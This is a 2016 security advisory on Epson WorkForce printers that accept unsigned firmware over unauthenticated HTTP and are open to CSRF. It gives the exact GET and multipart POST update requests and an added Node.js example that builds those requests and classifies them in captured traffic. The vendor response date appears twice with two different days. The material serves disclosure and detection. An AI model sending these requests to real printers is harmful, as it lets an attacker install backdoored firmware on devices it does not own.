Epson WorkForce Lack Of Firmware Signing / CSRF
Posted Sep 26, 2016
Authored by Ralf Spenneberg

Epson WorkForce multi-function printers do not use signed firmware images and allow unauthorized, malicious firmware updates. Additionally, they suffer from a cross-site request forgery vulnerability that lets an attacker trigger such a firmware update.

tags | exploit, csrf
SHA-256 | 1cd736567c6dd8e7a4095d0328fa865f1aa4a27333c0a07940e10243460214b6

OpenSource Security Ralf Spenneberg
Am Bahnhof 3-5
48565 Steinfurt
info@os-s.net

OS-S Security Advisory 2016-19

Title: Epson WorkForce multi-function printers do not use signed
firmware images and allow unauthorized malicious firmware-updates
Authors: Yves-Noel Weweler <y.weweler@gmail.com>, Ralf Spenneberg
<ralf@os-t.de>, Hendrik Schwartke <hendrik@os-t.de>

Date: September 26th 2015
Vendor contacted: September 29th 2015
Vendor response: December 12th 2015
Updated firmware available: January 28th 2016
CVSS: 10

Abstract
Epson multi-function printers support firmware updates via USB and HTTP.
When using HTTP, the update is initialized with a GET request and the
firmware is uploaded via a POST request. No authorization is required.
An attacker can exploit this unauthorized mechanism using Cross-Site
Request Forgery (CSRF). Because the firmware itself is neither encrypted
nor digitally signed, an attacker can create malicious firmware images
including backdoors and other malware.

Impact
Very high. Epson is the third largest printer manufacturer worldwide and
sells millions of devices with this vulnerability. If these devices are
network enabled, an attacker can upload malicious firmware directly or
indirectly using CSRF. We were able to craft and install a malicious
firmware image implementing a backdoor using the built-in data/fax modem.
This backdoor may serve as a bridgehead into a network otherwise not
connected to the internet.

Exploit
Exploit code just needs to mimic the HTTP update mechanism, either
directly or via CSRF. With a basic understanding of the firmware format
and its checksums, an attacker can create malicious firmware images
including backdoors and malware for these devices.

Vulnerable

Tested: Epson WF-2540 MFP
Not tested, but probable after inspection of the firmware and IPv4
scans: most of the devices in the WorkForce and Stylus series.
We believe a huge number of the devices produced since 1999 use this
mechanism and could be vulnerable.

Technical description
Firmware provided for these devices consists of an embedded Linux
operating system packaged in Epson's proprietary firmware format. This
format is not digitally signed. With basic knowledge of the checksums
used in the firmware, an attacker is able to create a malicious firmware
image. Using the HTTP based firmware update mechanism, this firmware may
be installed as follows:
1. Initialize update
GET /FIRMWAREUPDATE HTTP/1.1\r\n
Accept: */*\r\n
Connection: Keep-Alive\r\n
\r\n

2. Upload firmware
POST /DOWN/FIRMWAREUPDATE/ROM1 HTTP/1.1\r\n
Accept: */*\r\n
Content-Type: multipart/form-data; boundary=---------------------------EPSONOP2HANAOKAGROUP1999\r\n
Content-Length: xxx\r\n
Connection: Keep-Alive\r\n
\r\n
---------------------------EPSONOP2HANAOKAGROUP1999\r\n
Content-Disposition: form-data; name="fname"; filename="/DUMMY.DAT"\r\n
Content-Type: application/octet-stream\r\n
\r\n
insert firmware here
\r\n
---------------------------EPSONOP2HANAOKAGROUP1999--\r\n

After the upload the device automatically installs the image. Since this
mechanism requires no authorization and no counter-measures against CSRF
are in place, an attacker can easily upload new firmware.
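The two-step exchange above, as an added example that is not part of the original advisory and not Epson's code: a Node.js script that builds both requests as raw bytes (with a Content-Length computed over the actual body) and a classifier that recognises the same exchange in captured traffic, the check a network tap in front of the printer would apply. Paths, header values, the boundary string and the form field name come from the advisory; the Host header, the 192.0.2.10 address and the placeholder firmware bytes are assumptions. One caveat: the advisory's capture shows the same dash run in the header boundary and in the body delimiter lines, while RFC 2046 requires the body delimiter to be the header boundary prefixed with "--"; the code follows the RFC.

```javascript
'use strict';
// Added example, not code from the OS-S advisory or from Epson: builds the
// two-step HTTP update exchange as raw request bytes and recognises that
// exchange in captured traffic. Paths, header values, the boundary string and
// the form field name are taken from the advisory; the Host header is added
// because HTTP/1.1 requires it; the firmware content is a constructed
// placeholder, not a real image.

const CRLF = '\r\n';
// Header boundary exactly as in the advisory's capture. RFC 2046 requires the
// delimiter lines in the body to be this string prefixed with "--".
const BOUNDARY = '---------------------------EPSONOP2HANAOKAGROUP1999';

// Step 1: the GET that puts the device into update mode. No credentials.
function buildInitRequest(host) {
  return [
    'GET /FIRMWAREUPDATE HTTP/1.1',
    `Host: ${host}`,
    'Accept: */*',
    'Connection: Keep-Alive',
    '', '',
  ].join(CRLF);
}

// Step 2: the multipart POST that carries the image. Returns a Buffer so the
// Content-Length is computed over the exact body bytes, binary included.
function buildUploadRequest(host, firmware) {
  const body = Buffer.concat([
    Buffer.from(
      `--${BOUNDARY}${CRLF}` +
      `Content-Disposition: form-data; name="fname"; filename="/DUMMY.DAT"${CRLF}` +
      `Content-Type: application/octet-stream${CRLF}${CRLF}`, 'latin1'),
    firmware,
    Buffer.from(`${CRLF}--${BOUNDARY}--${CRLF}`, 'latin1'),
  ]);
  const head = [
    'POST /DOWN/FIRMWAREUPDATE/ROM1 HTTP/1.1',
    `Host: ${host}`,
    'Accept: */*',
    `Content-Type: multipart/form-data; boundary=${BOUNDARY}`,
    `Content-Length: ${body.length}`,
    'Connection: Keep-Alive',
    '', '',
  ].join(CRLF);
  return Buffer.concat([Buffer.from(head, 'latin1'), body]);
}

// Detection side: given one captured request (Buffer or latin1 string, e.g.
// from a tap in front of the printer), return null for unrelated traffic or a
// record describing the update attempt. A non-null `origin` means a browser
// sent it cross-site (the CSRF path); declaredLength differing from
// bodyLength means the capture is truncated or the upload is still in flight.
function classifyUpdateRequest(raw) {
  const text = Buffer.isBuffer(raw) ? raw.toString('latin1') : raw;
  const headEnd = text.indexOf(CRLF + CRLF);
  if (headEnd < 0) return null;
  const lines = text.slice(0, headEnd).split(CRLF);
  const [method, path] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  if (method === 'GET' && path === '/FIRMWAREUPDATE') {
    return { stage: 'init', path, origin: headers.origin || headers.referer || null };
  }
  if (method === 'POST' && path.startsWith('/DOWN/FIRMWAREUPDATE/')) {
    const body = text.slice(headEnd + 4);
    const bnd = /boundary=([^;]+)/.exec(headers['content-type'] || '');
    const fname = /filename="([^"]*)"/.exec(body);
    return {
      stage: 'upload',
      path,
      boundary: bnd ? bnd[1].trim() : null,
      filename: fname ? fname[1] : null,
      declaredLength: Number(headers['content-length']),
      bodyLength: body.length,
      origin: headers.origin || headers.referer || null,
    };
  }
  return null;
}

// Constructed stand-in for a firmware image (a few bytes, some non-ASCII).
const SAMPLE_FIRMWARE = Buffer.from([0x45, 0x50, 0x53, 0x4f, 0x4e, 0x00, 0xff, 0x10]);

// Walk through the exchange once; returns what a tap would record.
function demo(host = '192.0.2.10') {
  const init = buildInitRequest(host);
  const upload = buildUploadRequest(host, SAMPLE_FIRMWARE);
  return { init: classifyUpdateRequest(init), upload: classifyUpdateRequest(upload), rawUpload: upload };
}
```

demo() returns the classifier's records for both requests. On a tap, a non-null origin on the upload record marks the CSRF path (a browser sends Origin or Referer on a cross-site POST, while the advisory's capture, and therefore a direct exploit mimicking it, carries neither), and a declaredLength that differs from bodyLength marks a partial capture rather than a complete upload.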

Solution
A modification of the upgrade mechanism is required.

Vendor Response
Epson responded on December 2nd 2015:

>>>Quote-Start
>>>[Vulnerability]
>>>WF-2540 MFP has the vulnerability that you kindly advised. However,
>>>a firmware check function by our original algorithm has been
>>>implemented in the current products as the countermeasure for the
>>>vulnerability, and it will be implemented in all future products
>>>also.
>>>
>>>[Solution]
>>>We will release new firmware for WF-2540 by the end of January
>>>2016. (It will be delivered to a customer by a firmware updater
>>>(utility) from our internet server or website.)
>>>In addition, we may be willing to provide new firmware for other
>>>older products corresponding to the request by a customer.
>>>
>>>[Network security for our products]
>>>We are going to publish network security guidance for customers so
>>>that they will mitigate the effects of this issue by following the
>>>guidance.
>>>Quote-End
--
OpenSource Training Ralf Spenneberg http://www.os-t.de
Am Bahnhof 3-5 48565 Steinfurt Germany
Fon: +49(0)2552 638 755 Fax: +49(0)2552 638 757